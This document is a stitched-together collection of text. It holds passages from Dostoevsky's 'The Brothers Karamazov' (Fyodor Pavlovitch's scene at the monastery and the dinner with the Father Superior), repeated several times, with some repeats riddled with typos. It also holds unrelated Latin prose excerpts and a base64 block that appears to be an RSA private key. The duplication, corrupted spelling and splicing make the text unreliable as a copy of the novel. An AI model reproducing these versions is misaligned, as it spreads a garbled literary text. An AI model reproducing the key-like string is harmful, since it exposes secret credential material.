"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves, Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you! " he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delighted. "Did I not say he was von Sohn. It is von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprised at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somewhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skip on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angrily to the coachman.
"Why, what are you doing, what are you about? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch said again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observed sententiously, but Ivan made no response.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
Miusov, as a man of breeding and delicacy, could not but feel some inward qualms, when he reached the Father Superior's with Ivan: he felt ashamed of having lost his temper. He felt that he ought to have disdained that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "The monks were not to blame, in any case," he reflected, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous with them? I won't argue, I'll fall in with everything, I'll win them by politeness, and show them that I've nothing to do with that Aesop, that buffoon, that Pierrot, and have merely been taken in over this affair, just as they have."
He determined to drop his litigation with the monastery, and relinquish his claims to the wood-cutting and fishery rights at once. He was the more ready to do this because the rights had become much less valuable, and he had indeed the vaguest idea where the wood and river in question were.
These excellent intentions were strengthened when he entered the Father Superior's dining-room, though, strictly speaking, it was not a dining-room, for the Father Superior had only two rooms altogether; they were, however, much larger and more comfortable than Father Zossima's. But there was no great luxury about the furnishing of these rooms either. The furniture was of mahogany, covered with leather, in the old-fashioned style of 1820; the floor was not even stained, but everything was shining with cleanliness, and there were many choice flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beautifully decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neighborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-soup made of sterlets, served with little fish patties; then boiled fish served in a special way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footing everywhere, and got information about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominent part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorable, and quite unconscious of being so himself, considering, on the contrary, that because he would not steal money left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have influenced him in that.
Rakitin, of course, was a person of too little consequence to be invited to the dinner, to which Father Iosif, Father Paissy, and one other monk were the only inmates of the monastery invited. They were already waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streaked with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approached to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to avoid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peasants do.
"We must apologize most humbly, your reverence," began Miusov, simpering affably, and speaking in a dignified and respectful tone. "Pardon us for having come alone without the gentleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitality, and not without reason. In the reverend Father Zossima's cell he was carried away by the unhappy dissension with his son, and let fall words which were quite out of keeping... in fact, quite unseemly... as" -- he glanced at the monks -- "your reverence is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologies and regrets. In brief, he hopes and desires to make amends later. He asks your blessing, and begs you to forget what has taken place."
As he uttered the last word of his tirade, Miusov completely recovered his self-complacency, and all traces of his former irritation disappeared. He fully and sincerely loved humanity again.
The Father Superior listened to him with dignity, and, with a slight bend of the head, replied:
"I sincerely deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holy image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculiar fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he really had meant to go home, and really had felt the impossibility of going to dine with the Father Superior as though nothing had happened, after his disgraceful behavior in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet his creaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he suddenly stopped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffoon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everyone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shameless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Remembering that now, he smiled quietly and malignantly, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expressed in the following words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worth. I will show them I don't care what they think -- that's all!"
He told the coachman to wait, while with rapid steps he returned to the monastery and straight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obscenity, but only to obscenity, to nothing criminal, nothing for which he could be legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeared in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicious chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the whole room.
For one moment everyone stared at him without a word; and at once everyone felt that something revolting, grotesque, positively scandalous, was about to happen. Miusov passed immediately from the most benevolent frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutely cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certainly cannot? Your reverence, am I to come in or not? Will you receive me as your guest?"
"You are welcome with all my heart," answered the Superior. "Gentlemen!" he added, "I venture to beg you most earnestly to lay aside your dissensions, and to be united in love and family harmony -- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cried Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywhere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my relation. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" muttered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior could not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famous murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you -- he was killed and robbed, and in spite of his venerable age, he was nailed up in a box and sent from Petersburg to Moscow in the luggage van, and while they were nailing him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Sohn. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the group of monks.
"Let us go," cried Miusov, addressing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another step into the room. "Allow me to finish. There in the cell you blamed me for behaving disrespectfully just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am the soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and having a look on the sly; and now I want to give you the last act of the performance. You know how things are with us? As a thing falls, so it lies. As a thing once has fallen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignant with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneel down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in secret: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... at the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak against me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correction of the Lord and He has sent it to heal my vain soul.' And so we humbly thank you, honored guest!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniousness and stock phrases! Old phrases and old gestures. The old lies and formal prostrations. We know all about them. A kiss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the truth is not to be found in eating gudgeon and that I proclaim aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being virtuous in the world, do good to society, without shutting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find that a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gatherer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obstinately silent. Miusov rushed from the room, and Kalganov after him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humiliation I endured." He thumped the table with his fist in a paroxysm of simulated feeling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalism, the age of steamers and railways. Neither a thousand, nor a hundred roubles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his life, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one moment almost believing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is written again, 'Bear circumspectly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselves, Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brandy and liqueur to it.... I've cloudberry wine. Hey, von Sohn, don't lose your chance." He went out, shouting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, catching sight of him. "You come home to me to-day, for good, and bring your pillow and mattress, and leave no trace behind."
Alyosha stood rooted to the spot, watching the scene in silence. Meanwhile, Fyodor Pavlovitch had got into the carriage, and Ivan was about to follow him in grim silence without even turning to say good-bye to Alyosha. But at this point another almost incredible scene of grotesque buffoonery gave the finishing touch to the episode. Maximov suddenly appeared by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him running. He was in such a hurry that in his impatience he put his foot on the step on which Ivan's left foot was still resting, and clutching the carriage he kept trying to jump in. "I am going with you! " he kept shouting, laughing a thin mirthful laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a violent punch in the breast and sent him flying. It was quite by chance he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the carriage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pause of two minutes, looking askance at his son, "Why, it was you got up all this monastery business. You urged it, you approved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snapped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited another two minutes.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shrugged his shoulders contemptuously, and turning away stared at the road. And they did not speak again all the way home.
'''
'''
Itaque verae amicitiae difficillime reperiuntur in iis qui in honoribus reque publica versantur; ubi enim istum invenias qui honorem amici anteponat suo? Quid? Haec ut omittam, quam graves, quam difficiles plerisque videntur calamitatum societates! Ad quas non est facile inventu qui descendant. Quamquam Ennius recte.
Et interdum acciderat, ut siquid in penetrali secreto nullo citerioris vitae ministro praesente paterfamilias uxori susurrasset in aurem, velut Amphiarao referente aut Marcio, quondam vatibus inclitis, postridie disceret imperator. ideoque etiam parietes arcanorum soli conscii timebantur.
Iamque lituis cladium concrepantibus internarum non celate ut antea turbidum saeviebat ingenium a veri consideratione detortum et nullo inpositorum vel conpositorum fidem sollemniter inquirente nec discernente a societate noxiorum insontes velut exturbatum e iudiciis fas omne discessit, et causarum legitima silente defensione carnifex rapinarum sequester et obductio capitum et bonorum ubique multatio versabatur per orientales provincias, quas recensere puto nunc oportunum absque Mesopotamia digesta, cum bella Parthica dicerentur, et Aegypto, quam necessario aliud reieci ad tempus.
Eodem tempore Serenianus ex duce, cuius ignavia populatam in Phoenice Celsen ante rettulimus, pulsatae maiestatis imperii reus iure postulatus ac lege, incertum qua potuit suffragatione absolvi, aperte convictus familiarem suum cum pileo, quo caput operiebat, incantato vetitis artibus ad templum misisse fatidicum, quaeritatum expresse an ei firmum portenderetur imperium, ut cupiebat, et cunctum.
Utque aegrum corpus quassari etiam levibus solet offensis, ita animus eius angustus et tener, quicquid increpuisset, ad salutis suae dispendium existimans factum aut cogitatum, insontium caedibus fecit victoriam luctuosam.
Nec sane haec sola pernicies orientem diversis cladibus adfligebat. Namque et Isauri, quibus est usitatum saepe pacari saepeque inopinis excursibus cuncta miscere, ex latrociniis occultis et raris, alente inpunitate adulescentem in peius audaciam ad bella gravia proruperunt, diu quidem perduelles spiritus inrequietis motibus erigentes, hac tamen indignitate perciti vehementer, ut iactitabant, quod eorum capiti quidam consortes apud Iconium Pisidiae oppidum in amphitheatrali spectaculo feris praedatricibus obiecti sunt praeter morem.
Unde Rufinus ea tempestate praefectus praetorio ad discrimen trusus est ultimum. ire enim ipse compellebatur ad militem, quem exagitabat inopia simul et feritas, et alioqui coalito more in ordinarias dignitates asperum semper et saevum, ut satisfaceret atque monstraret, quam ob causam annonae convectio sit impedita.
Hac ita persuasione reducti intra moenia bellatores obseratis undique portarum aditibus, propugnaculis insistebant et pinnis, congesta undique saxa telaque habentes in promptu, ut si quis se proripuisset interius, multitudine missilium sterneretur et lapidum.
Nihil est enim virtute amabilius, nihil quod magis adliciat ad diligendum, quippe cum propter virtutem et probitatem etiam eos, quos numquam vidimus, quodam modo diligamus. Quis est qui C. Fabrici, M'. Curi non cum caritate aliqua benevola memoriam usurpet, quos numquam viderit? quis autem est, qui Tarquinium Superbum, qui Sp. Cassium, Sp. Maelium non oderit? Cum duobus ducibus de imperio in Italia est decertatum, Pyrrho et Hannibale; ab altero propter probitatem eius non nimis alienos animos habemus, alterum propter crudelitatem semper haec civitas oderit.
Sed cautela nimia in peiores haeserat plagas, ut narrabimus postea, aemulis consarcinantibus insidias graves apud Constantium, cetera medium principem sed siquid auribus eius huius modi quivis infudisset ignotus, acerbum et inplacabilem et in hoc causarum titulo dissimilem sui.
Isdem diebus Apollinaris Domitiani gener, paulo ante agens palatii Caesaris curam, ad Mesopotamiam missus a socero per militares numeros immodice scrutabatur, an quaedam altiora meditantis iam Galli secreta susceperint scripta, qui conpertis Antiochiae gestis per minorem Armeniam lapsus Constantinopolim petit exindeque per protectores retractus artissime tenebatur.
Vide, quantum, inquam, fallare, Torquate. oratio me istius philosophi non offendit; nam et complectitur verbis, quod vult, et dicit plane, quod intellegam; et tamen ego a philosopho, si afferat eloquentiam, non asperner, si non habeat, non admodum flagitem. re mihi non aeque satisfacit, et quidem locis pluribus. sed quot homines, tot sententiae; falli igitur possumus.
Ibi victu recreati et quiete, postquam abierat timor, vicos opulentos adorti equestrium adventu cohortium, quae casu propinquabant, nec resistere planitie porrecta conati digressi sunt retroque concedentes omne iuventutis robur relictum in sedibus acciverunt.
Ego vero sic intellego, Patres conscripti, nos hoc tempore in provinciis decernendis perpetuae pacis habere oportere rationem. Nam quis hoc non sentit omnia alia esse nobis vacua ab omni periculo atque etiam suspicione belli?
Ac ne quis a nobis hoc ita dici forte miretur, quod alia quaedam in hoc facultas sit ingeni, neque haec dicendi ratio aut disciplina, ne nos quidem huic uni studio penitus umquam dediti fuimus. Etenim omnes artes, quae ad humanitatem pertinent, habent quoddam commune vinculum, et quasi cognatione quadam inter se continentur.
Iis igitur est difficilius satis facere, qui se Latina scripta dicunt contemnere. in quibus hoc primum est in quo admirer, cur in gravissimis rebus non delectet eos sermo patrius, cum idem fabellas Latinas ad verbum e Graecis expressas non inviti legant. quis enim tam inimicus paene nomini Romano est, qui Ennii Medeam aut Antiopam Pacuvii spernat aut reiciat, quod se isdem Euripidis fabulis delectari dicat, Latinas litteras oderit?
Post quorum necem nihilo lenius ferociens Gallus ut leo cadaveribus pastus multa huius modi scrutabatur. quae singula narrare non refert, me professione modum, quod evitandum est, excedamus.
Ipsam vero urbem Byzantiorum fuisse refertissimam atque ornatissimam signis quis ignorat? Quae illi, exhausti sumptibus bellisque maximis, cum omnis Mithridaticos impetus totumque Pontum armatum affervescentem in Asiam atque erumpentem, ore repulsum et cervicibus interclusum suis sustinerent, tum, inquam, Byzantii et postea signa illa et reliqua urbis ornanemta sanctissime custodita tenuerunt.
Nisi mihi Phaedrum, inquam, tu mentitum aut Zenonem putas, quorum utrumque audivi, cum mihi nihil sane praeter sedulitatem probarent, omnes mihi Epicuri sententiae satis notae sunt. atque eos, quos nominavi, cum Attico nostro frequenter audivi, cum miraretur ille quidem utrumque, Phaedrum autem etiam amaret, cotidieque inter nos ea, quae audiebamus, conferebamus, neque erat umquam controversia, quid ego intellegerem, sed quid probarem.
Paphius quin etiam et Cornelius senatores, ambo venenorum artibus pravis se polluisse confessi, eodem pronuntiante Maximino sunt interfecti. pari sorte etiam procurator monetae extinctus est. Sericum enim et Asbolium supra dictos, quoniam cum hortaretur passim nominare, quos vellent, adiecta religione firmarat, nullum igni vel ferro se puniri iussurum, plumbi validis ictibus interemit. et post hoe flammis Campensem aruspicem dedit, in negotio eius nullo sacramento constrictus.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
